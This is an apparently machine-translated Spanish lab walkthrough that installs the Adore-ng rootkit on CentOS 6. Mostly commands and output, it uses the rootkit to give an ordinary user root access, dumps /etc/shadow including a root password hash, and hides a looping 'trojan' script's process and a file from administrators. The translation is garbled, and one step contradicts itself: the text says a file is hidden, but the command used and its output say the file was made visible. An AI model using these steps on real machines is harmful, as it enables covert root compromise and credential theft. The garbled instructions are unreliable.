Analógico rootkit de Troya

Rootkit es una clase especial de software malicioso, su función es ocultar a sí mismo y los archivos especificados, los procesos y los enlaces web y otra información sobre el destino de la instalación, de manera más general se vea rootkits y troyanos, puertas traseras y otros programas maliciosos en conjunción .
Y hoy queremos aprender es simular como uno Rootkit malware: Adore-ng
medio ambiente: Centos 6
dos recursos utilizados aquí necesitar (descarga):

• adore-ng-master.zip
• kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm

Instalación adore-ng
montado dependencia: kernel-devel-2,6

[root@Fp-01 ~]# yum -y install kernel-devel-2.6.32-754.27.1.el6.x86_64.rpm 
Loaded plugins: fastestmirror, security
Setting up Install Process
……
Installed:
  kernel-devel.x86_64 0:2.6.32-754.27.1.el6                                                                                          
Complete!

Extraer instalador adore-ng

[root@Fp-01 ~]# unzip adore-ng-master.zip
[root@Fp-01 ~]# cd adore-ng-master
[root@Fp-01 adore-ng-master]# ll
-rw-r--r--. 1 root root  1143 Dec 30  2015 Makefile
# 已经有 makefile 文件，直接 make -j 4 编译即可
[root@Fp-01 adore-ng-master]# make -j 4

Módulo de carga

[root@Fp-01 adore-ng-master]# insmod adore-ng.ko

Ver Ayuda

[root@Fp-01 adore-ng-master]# ./ava
       I print info (secret UID etc)	
       h hide file	# 隐藏文件
       u unhide file	# 取消隐藏文件
       r execute as root	# 以root用户执行
       R remove PID forever	# 永久删除PID
       U uninstall adore	# 卸载 adore
       i make PID invisible	# 隐藏PID
       v make PID visible	# 取消隐藏PID

Los usuarios comunes a raíz mencionan la derecha
para agregar un usuario a probar el uso de una voluntad común

[root@Fp-01 ~]# useradd tom
[root@Fp-01 ~]# echo "123456" | passwd --stdin tom
Changing password for user tom.
passwd: all authentication tokens updated successfully.

Copiar Adorar-ng a la siguiente / tmp, debido a que el interruptor no puede entrar en el directorio personal del usuario root, cp -r: copia recursiva

[root@Fp-01 ~]# cp -r adore-ng-master /tmp/

Cambio de usuario, utilice el servidor de inicio de sesión de usuario tom

[root@Fp-01 ~]# ssh [email protected]
Are you sure you want to continue connecting (yes/no)? yes
tom@10.0.0.11's password: 
[tom@Fp-01 ~]$ whoami
tom

Prueba, edite / etc / shadow

[tom@Fp-01 ~]$ vim /etc/shadow                                                                     ……                     
"/etc/shadow" [Permission Denied] 

Se puede ver, la autorización es denegada, esta vez, tenemos que mencionar el derecho a usar el ava

[tom@Fp-01 ~]$ /tmp/adore-ng-master/ava r vim /etc/shadow
56,501,501,56
Adore 1.56 installed. Good luck.
root:$6$tQrXvHNXMxM6eTuN$WJWqoN5bYKuy/PVxpVeWYLCCZ32OCur1rjHIvHOOytjLPPxRMV3jRB6IbENgA2ZBDWI0cwEOTBSwVnmmQlyT7.:18172:0:99999:7:::
bin:*:15980:0:99999:7:::
daemon:*:15980:0:99999:7:::
adm:*:15980:0:99999:7:::
……

Ver en otro proceso terminal, la identidad del usuario es la raíz, el derecho a decir el éxito menciona explícitamente

[root@Fp-01 ~]# ps -ef |grep /etc/shadow
root      32703  30867  0 12:03 pts/3    00:00:00 vim /etc/shadow
root      32727  32667  0 12:03 pts/4    00:00:00 grep /etc/shadow

Oculta troyano proceso de
simulación de editar un programa de caballo de Troya

[tom@Fp-01 opt]$ /tmp/adore-ng-master/ava r mkdir script
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 opt]$ ll
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:09 script
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r vim a.sh
56,500,500,56
Adore 1.56 installed. Good luck.
#!/bin/bash

while :
do
        echo `This is the virus` >> date.txt
        sleep 1
done

Troyanos simple de salida analógica "Este es el virión", además de los permisos de ejecución, que se ejecuta en segundo plano

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r chmod +x a.sh
56,501,501,56
Adore 1.56 installed. Good luck.
[tom@Fp-01 script]$ /tmp/adore-ng-master/ava r ./a.sh &
[1] 33987
[tom@Fp-01 script]$ 56,501,501,56
Adore 1.56 installed. Good luck.

Ir a ver el proceso por el ID de proceso

[tom@Fp-01 script]$ ps -ef |grep 33987
root      33987  30867  0 12:14 pts/3    00:00:00 /bin/bash ./a.sh
root      34137  33987  0 12:14 pts/3    00:00:00 sleep 1
tom       34139  30867  0 12:14 pts/3    00:00:00 grep 33987

Se puede ver, a continuación, los piratas informáticos de simulación de procesos ocultos

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava i 33987
56,501,501,56
Adore 1.56 installed. Good luck.
Made PID 33987 invisible.

el éxito oculta, esta vez, vamos a ver el proceso de descubrimiento, el proceso se ha ocultado

[tom@Fp-01 script]$ ps -ef |grep 33987
tom       34139  30867  0 12:14 pts/3    00:00:00 grep 33987

mover grandes: oculta los archivos
primero en ver el directorio / opt bajo la información del archivo

[tom@Fp-01 ~]$ ll /opt/
total 4
drwxrwxr-x. 2 root root 4096 Feb 13 12:14 script
[tom@Fp-01 ~]$ ll /opt/script/
total 32
-rwxrwxr-x. 1 root root    77 Feb 13 12:13 a.sh
-rw-rw-r--. 1 root root 24737 Feb 13 12:24 date.txt
[tom@Fp-01 ~]$ tree /opt/
/opt/
└── script
    ├── a.sh
    └── date.txt

Simulamos ocultar date.txt

[tom@Fp-01 script]$ /tmp/adore-ng-master/ava u date.txt
56,500,500,56
Adore 1.56 installed. Good luck.
File 'date.txt' is now visible.

Esta vez a ver, no se puede encontrar un archivo se ha encontrado

[root@Fp-01 script]# tree /opt/
/opt/
└── script
    └── a.sh
[root@Fp-01 ~]# ll /opt/script/
total 48
-rwxrwxr-x. 1 root root    77 Feb 13 12:13 a.sh

Escalada de privilegios a los privilegios de root -> Ocultar padres -> proceso padre inicia un proceso hijo (de virus) -> Ocultar carpetas
como un troyano se ha completado, el administrador del sistema es difícil de encontrar